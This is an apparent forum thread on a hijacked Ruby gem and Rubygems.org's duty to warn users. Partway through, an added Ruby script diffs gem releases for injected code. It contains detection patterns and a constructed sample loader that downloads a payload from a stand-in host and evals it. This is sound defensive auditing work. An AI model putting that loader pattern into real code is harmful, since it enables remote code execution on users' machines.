So...we can all ignore how a popular ruby gem was hijacked and used to infect production webservers with malware because (to paraphrase) "it wasn't that popular"?
This was caught because the author diligently checked their dependencies line by line. How many ruby devs do that?
How many other gems are already hijacked but haven't been discovered because no-one has audited them? That number is almost certainly non-zero.
This is on Rubygems.org. They have enough information to warn devs that the gem might be infected (months since the maintainer logged in, gem version released without GitHub repo changes, maintainer email on Have I Been Pwned and no password change since that date, etc).
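The "checked their dependencies line by line" step above can be partly automated: fetch the previous and the new release of a gem, diff the unpacked trees, and grep only the lines the new release introduced for constructs that a hijacked package tends to carry (remote fetch, Base64 decode, eval, shell-out). The script below is an added example written for this page, not code from the thread or from Rubygems.org. It assumes the two versions were unpacked with `gem fetch NAME -v X` and `gem unpack NAME-X.gem`; the two file trees and the pattern list are constructed for illustration and the patterns are heuristics, not a complete malware signature set.

```ruby
# Added example: diff two unpacked gem versions and flag suspicious code that
# the new release introduced. Not part of the thread or of Rubygems.org.
require "set"

# Heuristic patterns common in injected gem payloads and rare in a routine
# minor release. Assumption: illustrative list, extend for your own audits.
SUSPICIOUS_PATTERNS = {
  dynamic_eval:  /\beval\s*\(|\binstance_eval\b|\bclass_eval\b/,
  base64_decode: /Base64\.(?:decode64|strict_decode64|urlsafe_decode64)/,
  remote_fetch:  /\bNet::HTTP\b|\bopen-uri\b|\bURI\.open\b|\bopen\(\s*["']https?:/,
  shell_exec:    /`[^`]+`|\bsystem\s*\(|\bIO\.popen\b|\bKernel\.exec\b/,
  env_read:      /\bENV\[/,
  hex_blob:      /\\x[0-9a-fA-F]{2}(?:\\x[0-9a-fA-F]{2}){15,}/
}.freeze

Finding = Struct.new(:path, :line_no, :rule, :line)

# Read an unpacked gem directory (from `gem unpack`) into { "rel/path" => bytes }.
def load_tree(dir)
  Dir.glob("**/*", base: dir).each_with_object({}) do |rel, tree|
    full = File.join(dir, rel)
    tree[rel] = File.binread(full) if File.file?(full)
  end
end

# Which files a release added, removed or changed compared with the previous one.
def diff_gem_trees(old_files, new_files)
  common = old_files.keys & new_files.keys
  {
    added:   (new_files.keys - old_files.keys).sort,
    removed: (old_files.keys - new_files.keys).sort,
    changed: common.select { |p| old_files[p] != new_files[p] }.sort
  }
end

# Lines present in the new file but absent from the old one, as [line, index].
# A set difference is enough: we only care what code the release introduced.
def added_lines(old_content, new_content)
  old_set = old_content.to_s.lines.map(&:chomp).to_set
  new_content.lines.map(&:chomp).each_with_index.reject { |l, _| old_set.include?(l) }
end

# Run the patterns over every line the new release added to Ruby source files.
def scan_added_code(old_files, new_files)
  d = diff_gem_trees(old_files, new_files)
  (d[:added] + d[:changed]).each_with_object([]) do |path, findings|
    next unless path.end_with?(".rb", ".gemspec", "Rakefile")
    added_lines(old_files[path], new_files[path]).each do |line, idx|
      SUSPICIOUS_PATTERNS.each do |rule, re|
        findings << Finding.new(path, idx + 1, rule, line.strip) if line.match?(re)
      end
    end
  end
end

# Constructed sample trees: version 1.2.0 and a "1.2.1" with an injected loader.
OLD_TREE = {
  "foo.gemspec" => "Gem::Specification.new do |s|\n  s.name = 'foo'\n  s.version = '1.2.0'\nend\n",
  "lib/foo.rb"  => "module Foo\n  def self.greet(name)\n    \"hello #\{name}\"\n  end\nend\n",
  "README.md"   => "# foo\n"
}.freeze

NEW_TREE = {
  "foo.gemspec"         => "Gem::Specification.new do |s|\n  s.name = 'foo'\n  s.version = '1.2.1'\nend\n",
  "lib/foo.rb"          => "module Foo\n  def self.greet(name)\n    \"hello, #\{name}\"\n  end\nend\n",
  "lib/foo/core_ext.rb" => "require 'base64'\nrequire 'net/http'\n\nmodule Foo\n" \
                           "  payload = Net::HTTP.get(URI('http://example.invalid/p'))\n" \
                           "  eval(Base64.decode64(payload))\nend\n",
  "README.md"           => "# foo\n\nNow faster.\n"
}.freeze

if $PROGRAM_NAME == __FILE__
  d = diff_gem_trees(OLD_TREE, NEW_TREE)
  puts "added: #{d[:added]}  removed: #{d[:removed]}  changed: #{d[:changed]}"
  scan_added_code(OLD_TREE, NEW_TREE).each do |f|
    puts "#{f.path}:#{f.line_no} [#{f.rule}] #{f.line}"
  end
end
```

Against real gems, replace the constructed hashes with `load_tree("foo-1.2.0")` and `load_tree("foo-1.2.1")`. Review every added file by hand regardless of findings: a new file under `lib/` that the gemspec did not previously ship, or a release with no matching tag in the upstream repo, is itself a signal even when no pattern fires.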
No, I didn't say that, and I would prefer that you not put words in my mouth. I was responding to a single statement in the parent comment that I thought was inaccurate.
> a [...] ruby gem was hijacked and used to infect production webservers with malware
I wasn't aware of any reports of this being exploited in production. Do you have an example?
I agree with the rest of your comment about the need for more active measures on the part of Rubygems.org and the likelihood that other gems -- especially infrequently used, semi-abandoned ones like this -- have been hijacked without anyone detecting.
No, I don't have any examples, but then, it's not likely we're going to hear of any; anyone affected is probably unaware (until now, maybe). I guess some might come out of the woodwork now.
But again, Rubygems should have data on who downloaded this version of this gem, and so should be able to warn them, and even publish that data so we know not to visit their sites until they acknowledge and fix.